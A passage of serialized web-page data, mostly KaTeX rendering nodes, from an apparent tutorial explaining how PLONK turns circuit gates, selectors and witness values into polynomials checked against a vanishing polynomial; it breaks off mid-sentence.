rops":146385,"children":146387},{"className":146386},[304],[146388],{"type":25,"tag":216,"props":146389,"children":146391},{"className":146390,"style":2209},[309],[146392],{"type":25,"tag":216,"props":146393,"children":146394},{},[],{"type":31,"value":146396},", and output ",{"type":25,"tag":82,"props":146398,"children":146400},{"className":146399},[212,4702],[146401],{"type":25,"tag":216,"props":146402,"children":146404},{"className":146403},[224],[146405],{"type":25,"tag":216,"props":146406,"children":146408},{"className":146407,"ariaHidden":230},[229],[146409],{"type":25,"tag":216,"props":146410,"children":146412},{"className":146411},[235],[146413,146417],{"type":25,"tag":216,"props":146414,"children":146416},{"className":146415,"style":4827},[240],[],{"type":25,"tag":216,"props":146418,"children":146420},{"className":146419},[246],[146421,146426],{"type":25,"tag":216,"props":146422,"children":146424},{"className":146423},[246,2151],[146425],{"type":31,"value":96988},{"type":25,"tag":216,"props":146427,"children":146429},{"className":146428},[2159],[146430],{"type":25,"tag":216,"props":146431,"children":146433},{"className":146432},[298,299],[146434,146463],{"type":25,"tag":216,"props":146435,"children":146437},{"className":146436},[304],[146438,146458],{"type":25,"tag":216,"props":146439,"children":146441},{"className":146440,"style":2270},[309],[146442],{"type":25,"tag":216,"props":146443,"children":146444},{"style":2274},[146445,146449],{"type":25,"tag":216,"props":146446,"children":146448},{"className":146447,"style":2181},[319],[],{"type":25,"tag":216,"props":146450,"children":146452},{"className":146451},[2186,2187,2188,2189],[146453],{"type":25,"tag":216,"props":146454,"children":146456},{"className":146455},[246,2151,2189],[146457],{"type":31,"value":2289},{"type":25,"tag":216,"props":146459,"children":146461},{"className":146460},[408],[146462],{"type":31,"value":411},{"type":25,"tag":216,"props":146464,"children":146466},{"className":146465},[304],[146467],{"type":25,"tag":216,"props":146468,"children":146470},{"className":146469,"style":2209},[309],[146471],{"type":25,"tag":216,"props":146472,"children":146473},{},[],{"type":31,"value":146475},". The prover's job is to show it knows wire values that satisfy every gate.",{"type":25,"tag":38,"props":146477,"children":146478},{},[146479,146481,146486,146488,146591,146593,146696,146698,146703],{"type":31,"value":146480},"Each gate imposes a constraint, and PLONK unifies all gate types into one expression using ",{"type":25,"tag":64,"props":146482,"children":146483},{},[146484],{"type":31,"value":146485},"selector",{"type":31,"value":146487}," values that act as switches: setting ",{"type":25,"tag":82,"props":146489,"children":146491},{"className":146490},[212,4702],[146492],{"type":25,"tag":216,"props":146493,"children":146495},{"className":146494},[224],[146496],{"type":25,"tag":216,"props":146497,"children":146499},{"className":146498,"ariaHidden":230},[229],[146500,146578],{"type":25,"tag":216,"props":146501,"children":146503},{"className":146502},[235],[146504,146508,146565,146569,146574],{"type":25,"tag":216,"props":146505,"children":146507},{"className":146506,"style":113888},[240],[],{"type":25,"tag":216,"props":146509,"children":146511},{"className":146510},[246],[146512,146517],{"type":25,"tag":216,"props":146513,"children":146515},{"className":146514,"style":2325},[246,2151],[146516],{"type":31,"value":97501},{"type":25,"tag":216,"props":146518,"children":146520},{"className":146519},[2159],[146521],{"type":25,"tag":216,"props":146522,"children":146524},{"className":146523},[298,299],[146525,146554],{"type":25,"tag":216,"props":146526,"children":146528},{"className":146527},[304],[146529,146549],{"type":25,"tag":216,"props":146530,"children":146532},{"className":146531,"style":2698},[309],[146533],{"type":25,"tag":216,"props":146534,"children":146535},{"style":2347},[146536,146540],{"type":25,"tag":216,"props":146537,"children":146539},{"className":146538,"style":2181},[319],[],{"type":25,"tag":216,"props":146541,"children":146543},{"className":146542},[2186,2187,2188,2189],[146544],{"type":25,"tag":216,"props":146545,"children":146547},{"className":146546,"style":2824},[246,2151,2189],[146548],{"type":31,"value":99018},{"type":25,"tag":216,"props":146550,"children":146552},{"className":146551},[408],[146553],{"type":31,"value":411},{"type":25,"tag":216,"props":146555,"children":146557},{"className":146556},[304],[146558],{"type":25,"tag":216,"props":146559,"children":146561},{"className":146560,"style":2209},[309],[146562],{"type":25,"tag":216,"props":146563,"children":146564},{},[],{"type":25,"tag":216,"props":146566,"children":146568},{"className":146567,"style":258},[257],[],{"type":25,"tag":216,"props":146570,"children":146572},{"className":146571},[263],[146573],{"type":31,"value":266},{"type":25,"tag":216,"props":146575,"children":146577},{"className":146576,"style":258},[257],[],{"type":25,"tag":216,"props":146579,"children":146581},{"className":146580},[235],[146582,146586],{"type":25,"tag":216,"props":146583,"children":146585},{"className":146584,"style":5293},[240],[],{"type":25,"tag":216,"props":146587,"children":146589},{"className":146588},[246],[146590],{"type":31,"value":184},{"type":31,"value":146592}," makes a row a multiplication gate, setting ",{"type":25,"tag":82,"props":146594,"children":146596},{"className":146595},[212,4702],[146597],{"type":25,"tag":216,"props":146598,"children":146600},{"className":146599},[224],[146601],{"type":25,"tag":216,"props":146602,"children":146604},{"className":146603,"ariaHidden":230},[229],[146605,146683],{"type":25,"tag":216,"props":146606,"children":146608},{"className":146607},[235],[146609,146613,146670,146674,146679],{"type":25,"tag":216,"props":146610,"children":146612},{"className":146611,"style":113888},[240],[],{"type":25,"tag":216,"props":146614,"children":146616},{"className":146615},[246],[146617,146622],{"type":25,"tag":216,"props":146618,"children":146620},{"className":146619,"style":2325},[246,2151],[146621],{"type":31,"value":97501},{"type":25,"tag":216,"props":146623,"children":146625},{"className":146624},[2159],[146626],{"type":25,"tag":216,"props":146627,"children":146629},{"className":146628},[298,299],[146630,146659],{"type":25,"tag":216,"props":146631,"children":146633},{"className":146632},[304],[146634,146654],{"type":25,"tag":216,"props":146635,"children":146637},{"className":146636,"style":2698},[309],[146638],{"type":25,"tag":216,"props":146639,"children":146640},{"style":2347},[146641,146645],{"type":25,"tag":216,"props":146642,"children":146644},{"className":146643,"style":2181},[319],[],{"type":25,"tag":216,"props":146646,"children":146648},{"className":146647},[2186,2187,2188,2189],[146649],{"type":25,"tag":216,"props":146650,"children":146652},{"className":146651},[246,2151,2189],[146653],{"type":31,"value":121947},{"type":25,"tag":216,"props":146655,"children":146657},{"className":146656},[408],[146658],{"type":31,"value":411},{"type":25,"tag":216,"props":146660,"children":146662},{"className":146661},[304],[146663],{"type":25,"tag":216,"props":146664,"children":146666},{"className":146665,"style":2209},[309],[146667],{"type":25,"tag":216,"props":146668,"children":146669},{},[],{"type":25,"tag":216,"props":146671,"children":146673},{"className":146672,"style":258},[257],[],{"type":25,"tag":216,"props":146675,"children":146677},{"className":146676},[263],[146678],{"type":31,"value":266},{"type":25,"tag":216,"props":146680,"children":146682},{"className":146681,"style":258},[257],[],{"type":25,"tag":216,"props":146684,"children":146686},{"className":146685},[235],[146687,146691],{"type":25,"tag":216,"props":146688,"children":146690},{"className":146689,"style":5293},[240],[],{"type":25,"tag":216,"props":146692,"children":146694},{"className":146693},[246],[146695],{"type":31,"value":184},{"type":31,"value":146697}," makes it contribute an addition term, and so on. The selector values define the circuit's shape and are public, known to both prover and verifier, while the wire values are the prover's secret witness. This per-row check does not ensure that wires between gates are consistent (that the output of one gate equals the input of the next); PLONK uses a separate ",{"type":25,"tag":64,"props":146699,"children":146700},{},[146701],{"type":31,"value":146702},"permutation argument",{"type":31,"value":146704}," for that, which we will not cover here.",{"type":25,"tag":606,"props":146706,"children":146708},{"id":146707},"from-many-checks-to-one",[146709],{"type":31,"value":146710},"From many checks to one",{"type":25,"tag":38,"props":146712,"children":146713},{},[146714,146716,146721,146722,146814,146815,146907,146908,147000,147002,147007,147008,147100,147101,147193,147195,147220,147222,147247,147249,147341,147343,147368,147370,147395],{"type":31,"value":146715},"Instead of checking each gate individually, PLONK reads the execution trace column by column and uses FFT interpolation to convert each array of values to a single polynomial. The wire values become ",{"type":25,"tag":64,"props":146717,"children":146718},{},[146719],{"type":31,"value":146720},"witness polynomials",{"type":31,"value":10409},{"type":25,"tag":82,"props":146723,"children":146725},{"className":146724},[212,4702],[146726],{"type":25,"tag":216,"props":146727,"children":146729},{"className":146728},[224],[146730],{"type":25,"tag":216,"props":146731,"children":146733},{"className":146732,"ariaHidden":230},[229],[146734],{"type":25,"tag":216,"props":146735,"children":146737},{"className":146736},[235],[146738,146742,146799,146804,146809],{"type":25,"tag":216,"props":146739,"children":146741},{"className":146740,"style":5513},[240],[],{"type":25,"tag":216,"props":146743,"children":146745},{"className":146744},[246],[146746,146751],{"type":25,"tag":216,"props":146747,"children":146749},{"className":146748,"style":99359},[246,2151],[146750],{"type":31,"value":37047},{"type":25,"tag":216,"props":146752,"children":146754},{"className":146753},[2159],[146755],{"type":25,"tag":216,"props":146756,"children":146758},{"className":146757},[298,299],[146759,146788],{"type":25,"tag":216,"props":146760,"children":146762},{"className":146761},[304],[146763,146783],{"type":25,"tag":216,"props":146764,"children":146766},{"className":146765,"style":2698},[309],[146767],{"type":25,"tag":216,"props":146768,"children":146769},{"style":99380},[146770,146774],{"type":25,"tag":216,"props":146771,"children":146773},{"className":146772,"style":2181},[319],[],{"type":25,"tag":216,"props":146775,"children":146777},{"className":146776},[2186,2187,2188,2189],[146778],{"type":25,"tag":216,"props":146779,"children":146781},{"className":146780},[246,2151,2189],[146782],{"type":31,"value":121947},{"type":25,"tag":216,"props":146784,"children":146786},{"className":146785},[408],[146787],{"type":31,"value":411},{"type":25,"tag":216,"props":146789,"children":146791},{"className":146790},[304],[146792],{"type":25,"tag":216,"props":146793,"children":146795},{"className":146794,"style":2209},[309],[146796],{"type":25,"tag":216,"props":146797,"children":146798},{},[],{"type":25,"tag":216,"props":146800,"children":146802},{"className":146801},[287],[146803],{"type":31,"value":1850},{"type":25,"tag":216,"props":146805,"children":146807},{"className":146806},[246,2151],[146808],{"type":31,"value":2541},{"type":25,"tag":216,"props":146810,"children":146812},{"className":146811},[427],[146813],{"type":31,"value":1888},{"type":31,"value":7026},{"type":25,"tag":82,"props":146816,"children":146818},{"className":146817},[212,4702],[146819],{"type":25,"tag":216,"props":146820,"children":146822},{"className":146821},[224],[146823],{"type":25,"tag":216,"props":146824,"children":146826},{"className":146825,"ariaHidden":230},[229],[146827],{"type":25,"tag":216,"props":146828,"children":146830},{"className":146829},[235],[146831,146835,146892,146897,146902],{"type":25,"tag":216,"props":146832,"children":146834},{"className":146833,"style":5513},[240],[],{"type":25,"tag":216,"props":146836,"children":146838},{"className":146837},[246],[146839,146844],{"type":25,"tag":216,"props":146840,"children":146842},{"className":146841,"style":99359},[246,2151],[146843],{"type":31,"value":37047},{"type":25,"tag":216,"props":146845,"children":146847},{"className":146846},[2159],[146848],{"type":25,"tag":216,"props":146849,"children":146851},{"className":146850},[298,299],[146852,146881],{"type":25,"tag":216,"props":146853,"children":146855},{"className":146854},[304],[146856,146876],{"type":25,"tag":216,"props":146857,"children":146859},{"className":146858,"style":2698},[309],[146860],{"type":25,"tag":216,"props":146861,"children":146862},{"style":99380},[146863,146867],{"type":25,"tag":216,"props":146864,"children":146866},{"className":146865,"style":2181},[319],[],{"type":25,"tag":216,"props":146868,"children":146870},{"className":146869},[2186,2187,2188,2189],[146871],{"type":25,"tag":216,"props":146872,"children":146874},{"className":146873,"style":2896},[246,2151,2189],[146875],{"type":31,"value":2899},{"type":25,"tag":216,"props":146877,"children":146879},{"className":146878},[408],[146880],{"type":31,"value":411},{"type":25,"tag":216,"props":146882,"children":146884},{"className":146883},[304],[146885],{"type":25,"tag":216,"props":146886,"children":146888},{"className":146887,"style":2209},[309],[146889],{"type":25,"tag":216,"props":146890,"children":146891},{},[],{"type":25,"tag":216,"props":146893,"children":146895},{"className":146894},[287],[146896],{"type":31,"value":1850},{"type":25,"tag":216,"props":146898,"children":146900},{"className":146899},[246,2151],[146901],{"type":31,"value":2541},{"type":25,"tag":216,"props":146903,"children":146905},{"className":146904},[427],[146906],{"type":31,"value":1888},{"type":31,"value":7026},{"type":25,"tag":82,"props":146909,"children":146911},{"className":146910},[212,4702],[146912],{"type":25,"tag":216,"props":146913,"children":146915},{"className":146914},[224],[146916],{"type":25,"tag":216,"props":146917,"children":146919},{"className":146918,"ariaHidden":230},[229],[146920],{"type":25,"tag":216,"props":146921,"children":146923},{"className":146922},[235],[146924,146928,146985,146990,146995],{"type":25,"tag":216,"props":146925,"children":146927},{"className":146926,"style":5513},[240],[],{"type":25,"tag":216,"props":146929,"children":146931},{"className":146930},[246],[146932,146937],{"type":25,"tag":216,"props":146933,"children":146935},{"className":146934,"style":99359},[246,2151],[146936],{"type":31,"value":37047},{"type":25,"tag":216,"props":146938,"children":146940},{"className":146939},[2159],[146941],{"type":25,"tag":216,"props":146942,"children":146944},{"className":146943},[298,299],[146945,146974],{"type":25,"tag":216,"props":146946,"children":146948},{"className":146947},[304],[146949,146969],{"type":25,"tag":216,"props":146950,"children":146952},{"className":146951,"style":2698},[309],[146953],{"type":25,"tag":216,"props":146954,"children":146955},{"style":99380},[146956,146960],{"type":25,"tag":216,"props":146957,"children":146959},{"className":146958,"style":2181},[319],[],{"type":25,"tag":216,"props":146961,"children":146963},{"className":146962},[2186,2187,2188,2189],[146964],{"type":25,"tag":216,"props":146965,"children":146967},{"className":146966,"style":2752},[246,2151,2189],[146968],{"type":31,"value":119302},{"type":25,"tag":216,"props":146970,"children":146972},{"className":146971},[408],[146973],{"type":31,"value":411},{"type":25,"tag":216,"props":146975,"children":146977},{"className":146976},[304],[146978],{"type":25,"tag":216,"props":146979,"children":146981},{"className":146980,"style":2209},[309],[146982],{"type":25,"tag":216,"props":146983,"children":146984},{},[],{"type":25,"tag":216,"props":146986,"children":146988},{"className":146987},[287],[146989],{"type":31,"value":1850},{"type":25,"tag":216,"props":146991,"children":146993},{"className":146992},[246,2151],[146994],{"type":31,"value":2541},{"type":25,"tag":216,"props":146996,"children":146998},{"className":146997},[427],[146999],{"type":31,"value":1888},{"type":31,"value":147001}," and the selectors become ",{"type":25,"tag":64,"props":147003,"children":147004},{},[147005],{"type":31,"value":147006},"selector polynomials",{"type":31,"value":10409},{"type":25,"tag":82,"props":147009,"children":147011},{"className":147010},[212,4702],[147012],{"type":25,"tag":216,"props":147013,"children":147015},{"className":147014},[224],[147016],{"type":25,"tag":216,"props":147017,"children":147019},{"className":147018,"ariaHidden":230},[229],[147020],{"type":25,"tag":216,"props":147021,"children":147023},{"className":147022},[235],[147024,147028,147085,147090,147095],{"type":25,"tag":216,"props":147025,"children":147027},{"className":147026,"style":5513},[240],[],{"type":25,"tag":216,"props":147029,"children":147031},{"className":147030},[246],[147032,147037],{"type":25,"tag":216,"props":147033,"children":147035},{"className":147034},[246,2151],[147036],{"type":31,"value":80774},{"type":25,"tag":216,"props":147038,"children":147040},{"className":147039},[2159],[147041],{"type":25,"tag":216,"props":147042,"children":147044},{"className":147043},[298,299],[147045,147074],{"type":25,"tag":216,"props":147046,"children":147048},{"className":147047},[304],[147049,147069],{"type":25,"tag":216,"props":147050,"children":147052},{"className":147051,"style":2698},[309],[147053],{"type":25,"tag":216,"props":147054,"children":147055},{"style":2274},[147056,147060],{"type":25,"tag":216,"props":147057,"children":147059},{"className":147058,"style":2181},[319],[],{"type":25,"tag":216,"props":147061,"children":147063},{"className":147062},[2186,2187,2188,2189],[147064],{"type":25,"tag":216,"props":147065,"children":147067},{"className":147066,"style":2824},[246,2151,2189],[147068],{"type":31,"value":99018},{"type":25,"tag":216,"props":147070,"children":147072},{"className":147071},[408],[147073],{"type":31,"value":411},{"type":25,"tag":216,"props":147075,"children":147077},{"className":147076},[304],[147078],{"type":25,"tag":216,"props":147079,"children":147081},{"className":147080,"style":2209},[309],[147082],{"type":25,"tag":216,"props":147083,"children":147084},{},[],{"type":25,"tag":216,"props":147086,"children":147088},{"className":147087},[287],[147089],{"type":31,"value":1850},{"type":25,"tag":216,"props":147091,"children":147093},{"className":147092},[246,2151],[147094],{"type":31,"value":2541},{"type":25,"tag":216,"props":147096,"children":147098},{"className":147097},[427],[147099],{"type":31,"value":1888},{"type":31,"value":7026},{"type":25,"tag":82,"props":147102,"children":147104},{"className":147103},[212,4702],[147105],{"type":25,"tag":216,"props":147106,"children":147108},{"className":147107},[224],[147109],{"type":25,"tag":216,"props":147110,"children":147112},{"className":147111,"ariaHidden":230},[229],[147113],{"type":25,"tag":216,"props":147114,"children":147116},{"className":147115},[235],[147117,147121,147178,147183,147188],{"type":25,"tag":216,"props":147118,"children":147120},{"className":147119,"style":5513},[240],[],{"type":25,"tag":216,"props":147122,"children":147124},{"className":147123},[246],[147125,147130],{"type":25,"tag":216,"props":147126,"children":147128},{"className":147127},[246,2151],[147129],{"type":31,"value":80774},{"type":25,"tag":216,"props":147131,"children":147133},{"className":147132},[2159],[147134],{"type":25,"tag":216,"props":147135,"children":147137},{"className":147136},[298,299],[147138,147167],{"type":25,"tag":216,"props":147139,"children":147141},{"className":147140},[304],[147142,147162],{"type":25,"tag":216,"props":147143,"children":147145},{"className":147144,"style":2698},[309],[147146],{"type":25,"tag":216,"props":147147,"children":147148},{"style":2274},[147149,147153],{"type":25,"tag":216,"props":147150,"children":147152},{"className":147151,"style":2181},[319],[],{"type":25,"tag":216,"props":147154,"children":147156},{"className":147155},[2186,2187,2188,2189],[147157],{"type":25,"tag":216,"props":147158,"children":147160},{"className":147159},[246,2151,2189],[147161],{"type":31,"value":121947},{"type":25,"tag":216,"props":147163,"children":147165},{"className":147164},[408],[147166],{"type":31,"value":411},{"type":25,"tag":216,"props":147168,"children":147170},{"className":147169},[304],[147171],{"type":25,"tag":216,"props":147172,"children":147174},{"className":147173,"style":2209},[309],[147175],{"type":25,"tag":216,"props":147176,"children":147177},{},[],{"type":25,"tag":216,"props":147179,"children":147181},{"className":147180},[287],[147182],{"type":31,"value":1850},{"type":25,"tag":216,"props":147184,"children":147186},{"className":147185},[246,2151],[147187],{"type":31,"value":2541},{"type":25,"tag":216,"props":147189,"children":147191},{"className":147190},[427],[147192],{"type":31,"value":1888},{"type":31,"value":147194},", etc., all interpolated over a domain ",{"type":25,"tag":82,"props":147196,"children":147198},{"className":147197},[212,4702],[147199],{"type":25,"tag":216,"props":147200,"children":147202},{"className":147201},[224],[147203],{"type":25,"tag":216,"props":147204,"children":147206},{"className":147205,"ariaHidden":230},[229],[147207],{"type":25,"tag":216,"props":147208,"children":147210},{"className":147209},[235],[147211,147215],{"type":25,"tag":216,"props":147212,"children":147214},{"className":147213,"style":4799},[240],[],{"type":25,"tag":216,"props":147216,"children":147218},{"className":147217,"style":2679},[246,2151],[147219],{"type":31,"value":2682},{"type":31,"value":147221}," of ",{"type":25,"tag":82,"props":147223,"children":147225},{"className":147224},[212,4702],[147226],{"type":25,"tag":216,"props":147227,"children":147229},{"className":147228},[224],[147230],{"type":25,"tag":216,"props":147231,"children":147233},{"className":147232,"ariaHidden":230},[229],[147234],{"type":25,"tag":216,"props":147235,"children":147237},{"className":147236},[235],[147238,147242],{"type":25,"tag":216,"props":147239,"children":147241},{"className":147240,"style":6315},[240],[],{"type":25,"tag":216,"props":147243,"children":147245},{"className":147244},[246,2151],[147246],{"type":31,"value":2196},{"type":31,"value":147248},"-th roots of unity. Evaluating ",{"type":25,"tag":82,"props":147250,"children":147252},{"className":147251},[212,4702],[147253],{"type":25,"tag":216,"props":147254,"children":147256},{"className":147255},[224],[147257],{"type":25,"tag":216,"props":147258,"children":147260},{"className":147259,"ariaHidden":230},[229],[147261],{"type":25,"tag":216,"props":147262,"children":147264},{"className":147263},[235],[147265,147269,147326,147331,147336],{"type":25,"tag":216,"props":147266,"children":147268},{"className":147267,"style":5513},[240],[],{"type":25,"tag":216,"props":147270,"children":147272},{"className":147271},[246],[147273,147278],{"type":25,"tag":216,"props":147274,"children":147276},{"className":147275,"style":99359},[246,2151],[147277],{"type":31,"value":37047},{"type":25,"tag":216,"props":147279,"children":147281},{"className":147280},[2159],[147282],{"type":25,"tag":216,"props":147283,"children":147285},{"className":147284},[298,299],[147286,147315],{"type":25,"tag":216,"props":147287,"children":147289},{"className":147288},[304],[147290,147310],{"type":25,"tag":216,"props":147291,"children":147293},{"className":147292,"style":2698},[309],[147294],{"type":25,"tag":216,"props":147295,"children":147296},{"style":99380},[147297,147301],{"type":25,"tag":216,"props":147298,"children":147300},{"className":147299,"style":2181},[319],[],{"type":25,"tag":216,"props":147302,"children":147304},{"className":147303},[2186,2187,2188,2189],[147305],{"type":25,"tag":216,"props":147306,"children":147308},{"className":147307},[246,2151,2189],[147309],{"type":31,"value":121947},{"type":25,"tag":216,"props":147311,"children":147313},{"className":147312},[408],[147314],{"type":31,"value":411},{"type":25,"tag":216,"props":147316,"children":147318},{"className":147317},[304],[147319],{"type":25,"tag":216,"props":147320,"children":147322},{"className":147321,"style":2209},[309],[147323],{"type":25,"tag":216,"props":147324,"children":147325},{},[],{"type":25,"tag":216,"props":147327,"children":147329},{"className":147328},[287],[147330],{"type":31,"value":1850},{"type":25,"tag":216,"props":147332,"children":147334},{"className":147333},[246,2151],[147335],{"type":31,"value":2541},{"type":25,"tag":216,"props":147337,"children":147339},{"className":147338},[427],[147340],{"type":31,"value":1888},{"type":31,"value":147342}," at the ",{"type":25,"tag":82,"props":147344,"children":147346},{"className":147345},[212,4702],[147347],{"type":25,"tag":216,"props":147348,"children":147350},{"className":147349},[224],[147351],{"type":25,"tag":216,"props":147352,"children":147354},{"className":147353,"ariaHidden":230},[229],[147355],{"type":25,"tag":216,"props":147356,"children":147358},{"className":147357},[235],[147359,147363],{"type":25,"tag":216,"props":147360,"children":147362},{"className":147361,"style":146229},[240],[],{"type":25,"tag":216,"props":147364,"children":147366},{"className":147365},[246,2151],[147367],{"type":31,"value":2289},{"type":31,"value":147369},"-th root recovers the left wire value at row ",{"type":25,"tag":82,"props":147371,"children":147373},{"className":147372},[212,4702],[147374],{"type":25,"tag":216,"props":147375,"children":147377},{"className":147376},[224],[147378],{"type":25,"tag":216,"props":147379,"children":147381},{"className":147380,"ariaHidden":230},[229],[147382],{"type":25,"tag":216,"props":147383,"children":147385},{"className":147384},[235],[147386,147390],{"type":25,"tag":216,"props":147387,"children":147389},{"className":147388,"style":146229},[240],[],{"type":25,"tag":216,"props":147391,"children":147393},{"className":147392},[246,2151],[147394],{"type":31,"value":2289},{"type":31,"value":179},{"type":25,"tag":147397,"props":147398,"children":147399},"polynomial-interpolation-panel",{},[],{"type":25,"tag":38,"props":147401,"children":147402},{},[147403,147405,147445,147447,147513,147515,147645,147647,147687,147689,147729,147731,147771,147772,147894],{"type":31,"value":147404},"Because all columns are now polynomials, the entire circuit compresses into a single master constraint polynomial ",{"type":25,"tag":82,"props":147406,"children":147408},{"className":147407},[212,4702],[147409],{"type":25,"tag":216,"props":147410,"children":147412},{"className":147411},[224],[147413],{"type":25,"tag":216,"props":147414,"children":147416},{"className":147415,"ariaHidden":230},[229],[147417],{"type":25,"tag":216,"props":147418,"children":147420},{"className":147419},[235],[147421,147425,147430,147435,147440],{"type":25,"tag":216,"props":147422,"children":147424},{"className":147423,"style":5513},[240],[],{"type":25,"tag":216,"props":147426,"children":147428},{"className":147427,"style":2152},[246,2151],[147429],{"type":31,"value":5947},{"type":25,"tag":216,"props":147431,"children":147433},{"className":147432},[287],[147434],{"type":31,"value":1850},{"type":25,"tag":216,"props":147436,"children":147438},{"className":147437},[246,2151],[147439],{"type":31,"value":2541},{"type":25,"tag":216,"props":147441,"children":147443},{"className":147442},[427],[147444],{"type":31,"value":1888},{"type":31,"value":147446}," that combines selectors and witnesses. If the prover was honest, ",{"type":25,"tag":82,"props":147448,"children":147450},{"className":147449},[212,4702],[147451],{"type":25,"tag":216,"props":147452,"children":147454},{"className":147453},[224],[147455],{"type":25,"tag":216,"props":147456,"children":147458},{"className":147457,"ariaHidden":230},[229],[147459,147500],{"type":25,"tag":216,"props":147460,"children":147462},{"className":147461},[235],[147463,147467,147472,147477,147482,147487,147491,147496],{"type":25,"tag":216,"props":147464,"children":147466},{"className":147465,"style":5513},[240],[],{"type":25,"tag":216,"props":147468,"children":147470},{"className":147469,"style":2152},[246,2151],[147471],{"type":31,"value":5947},{"type":25,"tag":216,"props":147473,"children":147475},{"className":147474},[287],[147476],{"type":31,"value":1850},{"type":25,"tag":216,"props":147478,"children":147480},{"className":147479},[246,2151],[147481],{"type":31,"value":2541},{"type":25,"tag":216,"props":147483,"children":147485},{"className":147484},[427],[147486],{"type":31,"value":1888},{"type":25,"tag":216,"props":147488,"children":147490},{"className":147489,"style":258},[257],[],{"type":25,"tag":216,"props":147492,"children":147494},{"className":147493},[263],[147495],{"type":31,"value":266},{"type":25,"tag":216,"props":147497,"children":147499},{"className":147498,"style":258},[257],[],{"type":25,"tag":216,"props":147501,"children":147503},{"className":147502},[235],[147504,147508],{"type":25,"tag":216,"props":147505,"children":147507},{"className":147506,"style":5293},[240],[],{"type":25,"tag":216,"props":147509,"children":147511},{"className":147510},[246],[147512],{"type":31,"value":1882},{"type":31,"value":147514}," at every row index in the domain. The vanishing polynomial ",{"type":25,"tag":82,"props":147516,"children":147518},{"className":147517},[212,4702],[147519],{"type":25,"tag":216,"props":147520,"children":147522},{"className":147521},[224],[147523],{"type":25,"tag":216,"props":147524,"children":147526},{"className":147525,"ariaHidden":230},[229],[147527,147569,147632],{"type":25,"tag":216,"props":147528,"children":147530},{"className":147529},[235],[147531,147535,147541,147546,147551,147556,147560,147565],{"type":25,"tag":216,"props":147532,"children":147534},{"className":147533,"style":5513},[240],[],{"type":25,"tag":216,"props":147536,"children":147538},{"className":147537,"style":26065},[246,2151],[147539],{"type":31,"value":147540},"Z",{"type":25,"tag":216,"props":147542,"children":147544},{"className":147543},[287],[147545],{"type":31,"value":1850},{"type":25,"tag":216,"props":147547,"children":147549},{"className":147548},[246,2151],[147550],{"type":31,"value":2541},{"type":25,"tag":216,"props":147552,"children":147554},{"className":147553},[427],[147555],{"type":31,"value":1888},{"type":25,"tag":216,"props":147557,"children":147559},{"className":147558,"style":258},[257],[],{"type":25,"tag":216,"props":147561,"children":147563},{"className":147562},[263],[147564],{"type":31,"value":266},{"type":25,"tag":216,"props":147566,"children":147568},{"className":147567,"style":258},[257],[],{"type":25,"tag":216,"props":147570,"children":147572},{"className":147571},[235],[147573,147578,147619,147623,147628],{"type":25,"tag":216,"props":147574,"children":147577},{"className":147575,"style":147576},[240],"height:0.7477em;vertical-align:-0.0833em;",[],{"type":25,"tag":216,"props":147579,"children":147581},{"className":147580},[246],[147582,147587],{"type":25,"tag":216,"props":147583,"children":147585},{"className":147584},[246,2151],[147586],{"type":31,"value":2541},{"type":25,"tag":216,"props":147588,"children":147590},{"className":147589},[2159],[147591],{"type":25,"tag":216,"props":147592,"children":147594},{"className":147593},[298],[147595],{"type":25,"tag":216,"props":147596,"children":147598},{"className":147597},[304],[147599],{"type":25,"tag":216,"props":147600,"children":147602},{"className":147601,"style":6083},[309],[147603],{"type":25,"tag":216,"props":147604,"children":147605},{"style":6104},[147606,147610],{"type":25,"tag":216,"props":147607,"children":147609},{"className":147608,"style":2181},[319],[],{"type":25,"tag":216,"props":147611,"children":147613},{"className":147612},[2186,2187,2188,2189],[147614],{"type":25,"tag":216,"props":147615,"children":147617},{"className":147616},[246,2151,2189],[147618],{"type":31,"value":2196},{"type":25,"tag":216,"props":147620,"children":147622},{"className":147621,"style":335},[257],[],{"type":25,"tag":216,"props":147624,"children":147626},{"className":147625},[340],[147627],{"type":31,"value":3378},{"type":25,"tag":216,"props":147629,"children":147631},{"className":147630,"style":335},[257],[],{"type":25,"tag":216,"props":147633,"children":147635},{"className":147634},[235],[147636,147640],{"type":25,"tag":216,"props":147637,"children":147639},{"className":147638,"style":5293},[240],[],{"type":25,"tag":216,"props":147641,"children":147643},{"className":147642},[246],[147644],{"type":31,"value":184},{"type":31,"value":147646}," is zero on exactly those points, so if all constraints hold then ",{"type":25,"tag":82,"props":147648,"children":147650},{"className":147649},[212,4702],[147651],{"type":25,"tag":216,"props":147652,"children":147654},{"className":147653},[224],[147655],{"type":25,"tag":216,"props":147656,"children":147658},{"className":147657,"ariaHidden":230},[229],[147659],{"type":25,"tag":216,"props":147660,"children":147662},{"className":147661},[235],[147663,147667,147672,147677,147682],{"type":25,"tag":216,"props":147664,"children":147666},{"className":147665,"style":5513},[240],[],{"type":25,"tag":216,"props":147668,"children":147670},{"className":147669,"style":26065},[246,2151],[147671],{"type":31,"value":147540},{"type":25,"tag":216,"props":147673,"children":147675},{"className":147674},[287],[147676],{"type":31,"value":1850},{"type":25,"tag":216,"props":147678,"children":147680},{"className":147679},[246,2151],[147681],{"type":31,"value":2541},{"type":25,"tag":216,"props":147683,"children":147685},{"className":147684},[427],[147686],{"type":31,"value":1888},{"type":31,"value":147688}," divides ",{"type":25,"tag":82,"props":147690,"children":147692},{"className":147691},[212,4702],[147693],{"type":25,"tag":216,"props":147694,"children":147696},{"className":147695},[224],[147697],{"type":25,"tag":216,"props":147698,"children":147700},{"className":147699,"ariaHidden":230},[229],[147701],{"type":25,"tag":216,"props":147702,"children":147704},{"className":147703},[235],[147705,147709,147714,147719,147724],{"type":25,"tag":216,"props":147706,"children":147708},{"className":147707,"style":5513},[240],[],{"type":25,"tag":216,"props":147710,"children":147712},{"className":147711,"style":2152},[246,2151],[147713],{"type":31,"value":5947},{"type":25,"tag":216,"props":147715,"children":147717},{"className":147716},[287],[147718],{"type":31,"value":1850},{"type":25,"tag":216,"props":147720,"children":147722},{"className":147721},[246,2151],[147723],{"type":31,"value":2541},{"type":25,"tag":216,"props":147725,"children":147727},{"className":147726},[427],[147728],{"type":31,"value":1888},{"type":31,"value":147730},", yielding a quotient polynomial 